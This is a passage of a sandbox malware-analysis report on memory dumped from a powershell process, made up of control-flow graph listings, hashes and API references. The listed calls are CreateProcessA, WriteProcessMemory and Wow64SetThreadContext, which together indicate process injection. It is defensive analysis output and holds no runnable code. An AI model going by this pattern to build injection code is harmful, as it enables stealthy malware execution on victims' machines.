3377 719ef44-719ef92 3371->3377 3381 719ee68-719ee70 3372->3381 3382 719ee52-719ee58 3372->3382 3374->3369 3375->3369 3387 719ee90-719ee96 3376->3387 3388 719eea6-719eef0 3376->3388 3465 719ef97-719ef9e 3377->3465 3385 719f241-719f247 3378->3385 3386 719f236-719f23e 3378->3386 3389 719f199 3379->3389 3390 719f18b-719f197 3379->3390 3381->3360 3391 719ee5a 3382->3391 3392 719ee5c-719ee5e 3382->3392 3393 719f2cf-719f2d5 3383->3393 3394 719f2e5-719f2e9 3383->3394 3410 719f408 3384->3410 3411 719f3fa-719f406 3384->3411 3400 719f249-719f24b 3385->3400 3401 719f24d-719f259 3385->3401 3397 719ee98 3387->3397 3398 719ee9a-719eea4 3387->3398 3462 719eef8-719ef3d 3388->3462 3399 719f19b-719f19d 3389->3399 3390->3399 3391->3381 3392->3381 3403 719f2d9-719f2e3 3393->3403 3404 719f2d7 3393->3404 3405 719f2ef-719f2f1 3394->3405 3406 719f371-719f37b 3394->3406 3397->3388 3398->3388 3399->3378 3408 719f1a3-719f1a9 3399->3408 3409 719f25b-719f275 3400->3409 3401->3409 3403->3394 3404->3394 3413 719f301 3405->3413 3414 719f2f3-719f2ff 3405->3414 3418 719f388-719f38e 3406->3418 3419 719f37d-719f385 3406->3419 3415 719f1ab-719f1ad 3408->3415 3416 719f1b7-719f227 3408->3416 3422 719f40a-719f40c 3410->3422 3411->3422 3424 719f303-719f305 3413->3424 3414->3424 3415->3416 3426 719f390-719f392 3418->3426 3427 719f394-719f3a0 3418->3427 3428 719f490-719f49a 3422->3428 3429 719f412-719f414 3422->3429 3424->3406 3431 719f307-719f30d 3424->3431 3433 719f3a2-719f3bc 3426->3433 3427->3433 3441 719f49c-719f4a2 3428->3441 3442 719f4a5-719f4ab 3428->3442 3435 719f424 3429->3435 3436 719f416-719f422 3429->3436 3437 719f31b-719f36e 3431->3437 3438 719f30f-719f311 3431->3438 3445 719f426-719f428 3435->3445 3436->3445 3438->3437 3447 719f4ad-719f4af 3442->3447 3448 719f4b1-719f4bd 3442->3448 3445->3428 3449 719f42a-719f430 3445->3449 3452 719f4bf-719f4d8 3447->3452 3448->3452 3455 719f43e-719f44a 3449->3455 3456 719f432-719f434 3449->3456 3460 719f458-719f475 3455->3460 3461 719f44c-719f44e 3455->3461 3456->3455 3468 719f4db-719f4e0 3460->3468 3469 719f477-719f48a 3460->3469 3461->3460 3462->3377 3473 719ef3f-719ef42 3462->3473 3468->3469 3469->3428 3473->3465
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q$(o^q
                                                            • API String ID: 0-1946778100
                                                            • Opcode ID: 936ab97231fc649153b2e424f0af87da7f0230452e480850f06032f7e96cd9db
                                                            • Instruction ID: ee7161517cc548f5c7ca39920197b1c69344a5e2e9733df084bb547636e5063b
                                                            • Opcode Fuzzy Hash: 936ab97231fc649153b2e424f0af87da7f0230452e480850f06032f7e96cd9db
                                                            • Instruction Fuzzy Hash: 0B51FC72700205CFCF15CF58C544A697BE2AF81304F5980B6E8055F2D1DB31DD4ACB92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3474 719b286-719b2bb 3475 719b54d-719b596 3474->3475 3476 719b2c1-719b2c6 3474->3476 3488 719b748-719b768 3475->3488 3489 719b59c-719b5a1 3475->3489 3477 719b2c8-719b2ce 3476->3477 3478 719b2de-719b2e2 3476->3478 3479 719b2d0 3477->3479 3480 719b2d2-719b2dc 3477->3480 3481 719b2e8-719b2ec 3478->3481 3482 719b4fa-719b504 3478->3482 3479->3478 3480->3478 3486 719b2ff 3481->3486 3487 719b2ee-719b2fd 3481->3487 3484 719b512-719b518 3482->3484 3485 719b506-719b50f 3482->3485 3492 719b51a-719b51c 3484->3492 3493 719b51e-719b52a 3484->3493 3495 719b301-719b303 3486->3495 3487->3495 3508 719b76a-719b77f 3488->3508 3509 719b6fd-719b701 3488->3509 3490 719b5b9-719b5bd 3489->3490 3491 719b5a3-719b5a9 3489->3491 3499 719b5c3-719b5c5 3490->3499 3500 719b6f7-719b6fb 3490->3500 3496 719b5ab 3491->3496 3497 719b5ad-719b5b7 3491->3497 3498 719b52c-719b54a 3492->3498 3493->3498 3495->3482 3502 719b309-719b30b 3495->3502 3496->3490 3497->3490 3506 719b5d5 3499->3506 3507 719b5c7-719b5d3 3499->3507 3500->3509 3503 719b32a 3502->3503 3504 719b30d-719b328 3502->3504 3511 719b32c-719b32e 3503->3511 3504->3511 3512 719b5d7-719b5d9 3506->3512 3507->3512 3514 719b781-719b786 3508->3514 3515 719b7f5-719b821 3508->3515 3516 719b70f-719b715 3509->3516 3517 719b703-719b70c 3509->3517 3511->3482 3521 719b334-719b360 3511->3521 3512->3500 3522 719b5df-719b5e1 3512->3522 3523 719b788-719b78e 3514->3523 3524 719b79e-719b7aa 3514->3524 3534 719b84f-719b851 3515->3534 3535 719b823-719b844 3515->3535 3518 719b71b-719b727 3516->3518 3519 719b717-719b719 3516->3519 3525 719b729-719b745 3518->3525 3519->3525 3521->3482 3566 719b366-719b373 3521->3566 3528 719b5f1 3522->3528 3529 719b5e3-719b5ef 3522->3529 3531 719b790 3523->3531 3532 719b792-719b79c 3523->3532 3524->3515 3527 719b7ac-719b7b3 3524->3527 3537 719b7cb-719b7e8 3527->3537 3538 719b7b5-719b7bb 3527->3538 3540 719b5f3-719b5f5 3528->3540 3529->3540 3531->3524 3532->3524 3545 719b852-719b859 3534->3545 3535->3545 3564 719b846-719b848 3535->3564 3558 719b7e9-719b7f4 3537->3558 3543 719b7bd 3538->3543 3544 719b7bf-719b7c9 3538->3544 3540->3500 3546 719b5fb-719b606 3540->3546 3543->3537 3544->3537 3545->3558 3562 719b85b-719b867 3545->3562 3550 719b608-719b60e 3546->3550 3551 719b624 3546->3551 3552 719b610-719b612 3550->3552 3553 719b614-719b620 3550->3553 3554 719b626-719b632 3551->3554 3559 719b622 3552->3559 3553->3559 3554->3500 3568 719b638-719b650 3554->3568 3559->3554 3564->3534 3569 719b379-719b37e 3566->3569 3570 719b40c-719b44b 3566->3570 3578 719b66a-719b685 3568->3578 3579 719b652-719b658 3568->3579 3571 719b380-719b386 3569->3571 3572 719b396-719b3af 3569->3572 3602 719b452-719b456 3570->3602 3573 719b388 3571->3573 3574 719b38a-719b394 3571->3574 3572->3570 3581 719b3b1-719b3d3 3572->3581 3573->3572 3574->3572 3592 719b69d-719b6f4 3578->3592 3593 719b687-719b68d 3578->3593 3583 719b65a 3579->3583 3584 719b65c-719b668 3579->3584 3590 719b3ed-719b3f7 3581->3590 3591 719b3d5-719b3db 3581->3591 3583->3578 3584->3578 3597 719b3fc-719b40a 3590->3597 3594 719b3dd 3591->3594 3595 719b3df-719b3eb 3591->3595 3598 719b68f 3593->3598 3599 719b691-719b693 3593->3599 3594->3590 3595->3590 3597->3602 3598->3592 3599->3592 3603 719b479 3602->3603 3604 719b458-719b461 3602->3604 3608 719b47c-719b488 3603->3608 3606 719b468-719b475 3604->3606 3607 719b463-719b466 3604->3607 3609 719b477 3606->3609 3607->3609 3612 719b48a-719b490 3608->3612 3613 719b4a0-719b4f7 3608->3613 3609->3608 3614 719b492 3612->3614 3615 719b494-719b496 3612->3615 3614->3613 3615->3613
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q
                                                            • API String ID: 0-1785267070
                                                            • Opcode ID: a3230e5d1d939472fad3b8792e65a70b71db2e90462ae47a27ec6af454fc01a8
                                                            • Instruction ID: 5b1e273b90a6dd6d85eb73391604d6fe6c2efc5b3ff7eaff90c45909cc6d812b
                                                            • Opcode Fuzzy Hash: a3230e5d1d939472fad3b8792e65a70b71db2e90462ae47a27ec6af454fc01a8
                                                            • Instruction Fuzzy Hash: EE41C0F0A08109DBDF398F69E544BA9B7E2AF84710F558475D4069B2E1CB31DD42CB51

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3617 719b290-719b2bb 3618 719b54d-719b596 3617->3618 3619 719b2c1-719b2c6 3617->3619 3631 719b748-719b768 3618->3631 3632 719b59c-719b5a1 3618->3632 3620 719b2c8-719b2ce 3619->3620 3621 719b2de-719b2e2 3619->3621 3622 719b2d0 3620->3622 3623 719b2d2-719b2dc 3620->3623 3624 719b2e8-719b2ec 3621->3624 3625 719b4fa-719b504 3621->3625 3622->3621 3623->3621 3629 719b2ff 3624->3629 3630 719b2ee-719b2fd 3624->3630 3627 719b512-719b518 3625->3627 3628 719b506-719b50f 3625->3628 3635 719b51a-719b51c 3627->3635 3636 719b51e-719b52a 3627->3636 3638 719b301-719b303 3629->3638 3630->3638 3651 719b76a-719b77f 3631->3651 3652 719b6fd-719b701 3631->3652 3633 719b5b9-719b5bd 3632->3633 3634 719b5a3-719b5a9 3632->3634 3642 719b5c3-719b5c5 3633->3642 3643 719b6f7-719b6fb 3633->3643 3639 719b5ab 3634->3639 3640 719b5ad-719b5b7 3634->3640 3641 719b52c-719b54a 3635->3641 3636->3641 3638->3625 3645 719b309-719b30b 3638->3645 3639->3633 3640->3633 3649 719b5d5 3642->3649 3650 719b5c7-719b5d3 3642->3650 3643->3652 3646 719b32a 3645->3646 3647 719b30d-719b328 3645->3647 3654 719b32c-719b32e 3646->3654 3647->3654 3655 719b5d7-719b5d9 3649->3655 3650->3655 3657 719b781-719b786 3651->3657 3658 719b7f5-719b821 3651->3658 3659 719b70f-719b715 3652->3659 3660 719b703-719b70c 3652->3660 3654->3625 3664 719b334-719b360 3654->3664 3655->3643 3665 719b5df-719b5e1 3655->3665 3666 719b788-719b78e 3657->3666 3667 719b79e-719b7aa 3657->3667 3677 719b84f-719b851 3658->3677 3678 719b823-719b844 3658->3678 3661 719b71b-719b727 3659->3661 3662 719b717-719b719 3659->3662 3668 719b729-719b745 3661->3668 3662->3668 3664->3625 3709 719b366-719b373 3664->3709 3671 719b5f1 3665->3671 3672 719b5e3-719b5ef 3665->3672 3674 719b790 3666->3674 3675 719b792-719b79c 3666->3675 3667->3658 3670 719b7ac-719b7b3 3667->3670 3680 719b7cb-719b7e8 3670->3680 3681 719b7b5-719b7bb 3670->3681 3683 719b5f3-719b5f5 3671->3683 3672->3683 3674->3667 3675->3667 3688 719b852-719b859 3677->3688 3678->3688 3707 719b846-719b848 3678->3707 3701 719b7e9-719b7f4 3680->3701 3686 719b7bd 3681->3686 3687 719b7bf-719b7c9 3681->3687 3683->3643 3689 719b5fb-719b606 3683->3689 3686->3680 3687->3680 3688->3701 3705 719b85b-719b867 3688->3705 3693 719b608-719b60e 3689->3693 3694 719b624 3689->3694 3695 719b610-719b612 3693->3695 3696 719b614-719b620 3693->3696 3697 719b626-719b632 3694->3697 3702 719b622 3695->3702 3696->3702 3697->3643 3711 719b638-719b650 3697->3711 3702->3697 3707->3677 3712 719b379-719b37e 3709->3712 3713 719b40c-719b44b 3709->3713 3721 719b66a-719b685 3711->3721 3722 719b652-719b658 3711->3722 3714 719b380-719b386 3712->3714 3715 719b396-719b3af 3712->3715 3745 719b452-719b456 3713->3745 3716 719b388 3714->3716 3717 719b38a-719b394 3714->3717 3715->3713 3724 719b3b1-719b3d3 3715->3724 3716->3715 3717->3715 3735 719b69d-719b6f4 3721->3735 3736 719b687-719b68d 3721->3736 3726 719b65a 3722->3726 3727 719b65c-719b668 3722->3727 3733 719b3ed-719b3f7 3724->3733 3734 719b3d5-719b3db 3724->3734 3726->3721 3727->3721 3740 719b3fc-719b40a 3733->3740 3737 719b3dd 3734->3737 3738 719b3df-719b3eb 3734->3738 3741 719b68f 3736->3741 3742 719b691-719b693 3736->3742 3737->3733 3738->3733 3740->3745 3741->3735 3742->3735 3746 719b479 3745->3746 3747 719b458-719b461 3745->3747 3751 719b47c-719b488 3746->3751 3749 719b468-719b475 3747->3749 3750 719b463-719b466 3747->3750 3752 719b477 3749->3752 3750->3752 3755 719b48a-719b490 3751->3755 3756 719b4a0-719b4f7 3751->3756 3752->3751 3757 719b492 3755->3757 3758 719b494-719b496 3755->3758 3757->3756 3758->3756
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q
                                                            • API String ID: 0-1785267070
                                                            • Opcode ID: f360a07e6c1b9524f7504bbbc42f3d44b9513e3b897ec313df511e8b82b68f6b
                                                            • Instruction ID: f1ce1fc2619b0d3272cd4796d3bd912af36402119632b7bac3f58f6555b6ffbd
                                                            • Opcode Fuzzy Hash: f360a07e6c1b9524f7504bbbc42f3d44b9513e3b897ec313df511e8b82b68f6b
                                                            • Instruction Fuzzy Hash: E441BFF0B08209DBDF398F69E544BA9B7E2AF85710F558076D4069B2E1C731DD42CB51

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4029 7197740-7197752 4030 7197758-719775f 4029->4030 4031 719781a-7197824 4029->4031 4032 719786b-71978b6 4030->4032 4033 7197765-719776a 4030->4033 4034 7197832-7197838 4031->4034 4035 7197826-719782f 4031->4035 4058 71978b8 4032->4058 4059 71978ba-71978bc 4032->4059 4036 719776c-7197772 4033->4036 4037 7197782-719778b 4033->4037 4038 719783a-719783c 4034->4038 4039 719783e-719784a 4034->4039 4042 7197774 4036->4042 4043 7197776-7197780 4036->4043 4044 719778d 4037->4044 4045 719778f-719779b 4037->4045 4040 719784c-7197868 4038->4040 4039->4040 4042->4037 4043->4037 4046 719779d-71977b3 4044->4046 4045->4046 4046->4032 4053 71977b9-71977d9 4046->4053 4060 71977db-71977e1 4053->4060 4061 71977f3-71977ff 4053->4061 4062 71978c6 4058->4062 4059->4062 4063 71977e3 4060->4063 4064 71977e5-71977f1 4060->4064 4065 7197804-7197817 4061->4065 4063->4061 4064->4061
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q
                                                            • API String ID: 0-1785267070
                                                            • Opcode ID: e0bdc0bfcd2877da86d5ccc5aade9d7ea59ba6648073103b6525868b77449661
                                                            • Instruction ID: 0bccecfda54474d2b785769e0c662cb0e406a4fd843ffdb4621dc0bfc733ef12
                                                            • Opcode Fuzzy Hash: e0bdc0bfcd2877da86d5ccc5aade9d7ea59ba6648073103b6525868b77449661
                                                            • Instruction Fuzzy Hash: C011BEB0A10105ABCF188F58C889B6AFBA6EF84720F29C469D404AB2C4C732D843C7A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q
                                                            • API String ID: 0-355816377
                                                            • Opcode ID: bcdaa5866392fbcd6796b6437bd44771f0efc683fd075204a34bce850c05ab59
                                                            • Instruction ID: 913a2a19e1ba2e34c1e1d000e5053792813be494ad53f14f1fa9216df5772152
                                                            • Opcode Fuzzy Hash: bcdaa5866392fbcd6796b6437bd44771f0efc683fd075204a34bce850c05ab59
                                                            • Instruction Fuzzy Hash: 4511B9B55083469FDB178B14CC50E62FBB6AF82224F1980B7E805EB1D2E732D856C761

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4068 7195c0b-7195c15 4069 7195c1b 4068->4069 4070 7195c17-7195c1a 4068->4070 4071 7195c29-7195c3c 4069->4071 4072 7195c1d-7195c24 4069->4072 4070->4069 4074 7195c3e-7195c44 4071->4074 4075 7195c56-7195c61 4071->4075 4072->4071 4076 7195c48-7195c54 4074->4076 4077 7195c46 4074->4077 4078 7195c66-7195c6e 4075->4078 4076->4075 4077->4075 4080 7195c7c-7195c87 4078->4080 4081 7195c70-7195c72 4078->4081 4081->4080
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: tP^q$tP^q
                                                            • API String ID: 0-309238000
                                                            • Opcode ID: 54bfa65d7131317d2c9ce3197e818bfb644ea2165fb66a593e8b4256ac851b87
                                                            • Instruction ID: 9acde6613a77867cb9a7f78479cf9f1cfc1195a1437d0e0c84f01c40d6c57375
                                                            • Opcode Fuzzy Hash: 54bfa65d7131317d2c9ce3197e818bfb644ea2165fb66a593e8b4256ac851b87
                                                            • Instruction Fuzzy Hash: 4E0197B1F101259BCE254A98C804B6AF7E6EB88B10F14882AF5047F2C0C7329C5283E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: 16e377037828b783b193ea5339e19abd05f22a9b9ac447f861cbff7619a4ac70
                                                            • Instruction ID: 538d5ddde62cd5f22b1068e5786e5a0f4071ad8a80d165f506310b0cee987e9a
                                                            • Opcode Fuzzy Hash: 16e377037828b783b193ea5339e19abd05f22a9b9ac447f861cbff7619a4ac70
                                                            • Instruction Fuzzy Hash: 1E125EB4A01205DFDB15CF58C985E69BBB2FF8A704F15C069E8099B395CB32ED42CB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: 0fee2d4d845ba0a1c2c82415a00134704ddaaee5d84892f4d5ff701b6d40b21e
                                                            • Instruction ID: c6d7f8abdd65a784f51f53e4c482c192ff99d10f9f141d345c3be95bb4adc4ae
                                                            • Opcode Fuzzy Hash: 0fee2d4d845ba0a1c2c82415a00134704ddaaee5d84892f4d5ff701b6d40b21e
                                                            • Instruction Fuzzy Hash: 38124EB4A01205DFDB15CF58C984E69FBB2BF8A704F15C169E809AB395C732ED42CB81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4935 6c1de2f-6c1dea0 4938 6c1dea2-6c1deac 4935->4938 4939 6c1ded9-6c1def9 4935->4939 4938->4939 4940 6c1deae-6c1deb0 4938->4940 4946 6c1df32-6c1df6c 4939->4946 4947 6c1defb-6c1df05 4939->4947 4942 6c1ded3-6c1ded6 4940->4942 4943 6c1deb2-6c1debc 4940->4943 4942->4939 4944 6c1dec0-6c1decf 4943->4944 4945 6c1debe 4943->4945 4944->4944 4948 6c1ded1 4944->4948 4945->4944 4953 6c1dfa5-6c1e01a CreateProcessA 4946->4953 4954 6c1df6e-6c1df78 4946->4954 4947->4946 4949 6c1df07-6c1df09 4947->4949 4948->4942 4951 6c1df0b-6c1df15 4949->4951 4952 6c1df2c-6c1df2f 4949->4952 4955 6c1df17 4951->4955 4956 6c1df19-6c1df28 4951->4956 4952->4946 4966 6c1e023-6c1e06b 4953->4966 4967 6c1e01c-6c1e022 4953->4967 4954->4953 4957 6c1df7a-6c1df7c 4954->4957 4955->4956 4956->4956 4958 6c1df2a 4956->4958 4959 6c1df9f-6c1dfa2 4957->4959 4960 6c1df7e-6c1df88 4957->4960 4958->4952 4959->4953 4962 6c1df8a 4960->4962 4963 6c1df8c-6c1df9b 4960->4963 4962->4963 4963->4963 4964 6c1df9d 4963->4964 4964->4959 4972 6c1e07b-6c1e07f 4966->4972 4973 6c1e06d-6c1e071 4966->4973 4967->4966 4975 6c1e081-6c1e085 4972->4975 4976 6c1e08f-6c1e093 4972->4976 4973->4972 4974 6c1e073 4973->4974 4974->4972 4975->4976 4977 6c1e087 4975->4977 4978 6c1e0a3 4976->4978 4979 6c1e095-6c1e099 4976->4979 4977->4976 4981 6c1e0a4 4978->4981 4979->4978 4980 6c1e09b 4979->4980 4980->4978 4981->4981
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C1E00A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 8ef47f2682990d075032a017195f98bfa818a8bcc6c37846ae210a6c56530a58
                                                            • Instruction ID: 2bd15449ffefb76813d086bf22f5abbb6e75433b52751aa1689bea1e12d9ad2b
                                                            • Opcode Fuzzy Hash: 8ef47f2682990d075032a017195f98bfa818a8bcc6c37846ae210a6c56530a58
                                                            • Instruction Fuzzy Hash: 7E815571D006599FDB50CFA9C9817EEBBF2BF49310F148129E869EB240DB749A81DF81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4982 6c1de30-6c1dea0 4984 6c1dea2-6c1deac 4982->4984 4985 6c1ded9-6c1def9 4982->4985 4984->4985 4986 6c1deae-6c1deb0 4984->4986 4992 6c1df32-6c1df6c 4985->4992 4993 6c1defb-6c1df05 4985->4993 4988 6c1ded3-6c1ded6 4986->4988 4989 6c1deb2-6c1debc 4986->4989 4988->4985 4990 6c1dec0-6c1decf 4989->4990 4991 6c1debe 4989->4991 4990->4990 4994 6c1ded1 4990->4994 4991->4990 4999 6c1dfa5-6c1e01a CreateProcessA 4992->4999 5000 6c1df6e-6c1df78 4992->5000 4993->4992 4995 6c1df07-6c1df09 4993->4995 4994->4988 4997 6c1df0b-6c1df15 4995->4997 4998 6c1df2c-6c1df2f 4995->4998 5001 6c1df17 4997->5001 5002 6c1df19-6c1df28 4997->5002 4998->4992 5012 6c1e023-6c1e06b 4999->5012 5013 6c1e01c-6c1e022 4999->5013 5000->4999 5003 6c1df7a-6c1df7c 5000->5003 5001->5002 5002->5002 5004 6c1df2a 5002->5004 5005 6c1df9f-6c1dfa2 5003->5005 5006 6c1df7e-6c1df88 5003->5006 5004->4998 5005->4999 5008 6c1df8a 5006->5008 5009 6c1df8c-6c1df9b 5006->5009 5008->5009 5009->5009 5010 6c1df9d 5009->5010 5010->5005 5018 6c1e07b-6c1e07f 5012->5018 5019 6c1e06d-6c1e071 5012->5019 5013->5012 5021 6c1e081-6c1e085 5018->5021 5022 6c1e08f-6c1e093 5018->5022 5019->5018 5020 6c1e073 5019->5020 5020->5018 5021->5022 5023 6c1e087 5021->5023 5024 6c1e0a3 5022->5024 5025 6c1e095-6c1e099 5022->5025 5023->5022 5027 6c1e0a4 5024->5027 5025->5024 5026 6c1e09b 5025->5026 5026->5024 5027->5027
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C1E00A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: c4bbe7af043066c6a4819a6f6f2f9c8a2a5a1b760d16acd70e868ecf9557bb91
                                                            • Instruction ID: aeed1ded582f92f5af9da2d286f8903ae99f3defec23d52fcf30a3dc57211939
                                                            • Opcode Fuzzy Hash: c4bbe7af043066c6a4819a6f6f2f9c8a2a5a1b760d16acd70e868ecf9557bb91
                                                            • Instruction Fuzzy Hash: EA815571D006599FDB50CFA9C9817EEBBF2BF49310F148129E869EB240DB749A81DF81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: q
                                                            • API String ID: 0-4110462503
                                                            • Opcode ID: d0e122d0f3483b809bf7c7b441eb420b8776b91c012e752ddeba0dee9f594b77
                                                            • Instruction ID: 190f213bd4bf70ffc6ecf05a64bf3088d610ddaeda3fffdec8cd2c6b4daed882
                                                            • Opcode Fuzzy Hash: d0e122d0f3483b809bf7c7b441eb420b8776b91c012e752ddeba0dee9f594b77
                                                            • Instruction Fuzzy Hash: DAD169A694E3E45FCB039B6C98704E67FB09E5722070A41D3E0D4DF1B7D228998CC7A6
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C1EF20
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 8632c46b0a8a95ff4874f01d1e7a43a0200c2b19f836d4d7eaa61da1d8c3abc6
                                                            • Instruction ID: 3a39d6c2f8c1e597de0829bc8ee15b93765018f131986e3900a5aa10e63b8721
                                                            • Opcode Fuzzy Hash: 8632c46b0a8a95ff4874f01d1e7a43a0200c2b19f836d4d7eaa61da1d8c3abc6
                                                            • Instruction Fuzzy Hash: 7D2139B5D003599FCB10CFA9C885BDEBBF5FF48320F108429E958A7250C7789944DBA5
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C1EF20
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: c7f5724625a487c788726015950ec9a154ab0a7f3f47e966508ececbe8f63322
                                                            • Instruction ID: 3c948697e2acde556f716fa43865d53c5b21a890c90deabfbf841cad5e9db1dd
                                                            • Opcode Fuzzy Hash: c7f5724625a487c788726015950ec9a154ab0a7f3f47e966508ececbe8f63322
                                                            • Instruction Fuzzy Hash: 432139B5D003599FCB10CFA9C885BDEBBF5FF48320F108429E958A7250C7789944DBA5
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C1E66E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 96dd489bd8ef5005246c9c4a74d8837258b05b2f5291d08cee691213649eb55f
                                                            • Instruction ID: 05851bf2866a5400904705d8086e307734b828892272a67c05211bfd142ff9af
                                                            • Opcode Fuzzy Hash: 96dd489bd8ef5005246c9c4a74d8837258b05b2f5291d08cee691213649eb55f
                                                            • Instruction Fuzzy Hash: 9F214A719002089FCB50CFAAC4857EEBBF4AF49324F14842DD559A7240CB789585CFA5
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C1E66E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: d3831f96a50688b0d465fa000298fdd0dd0b270547318bbc323f1de2bdf16d52
                                                            • Instruction ID: 5ae57e80f338662464e63e8e5f2885893f5f1c7f76be2d3afffb66508f863429
                                                            • Opcode Fuzzy Hash: d3831f96a50688b0d465fa000298fdd0dd0b270547318bbc323f1de2bdf16d52
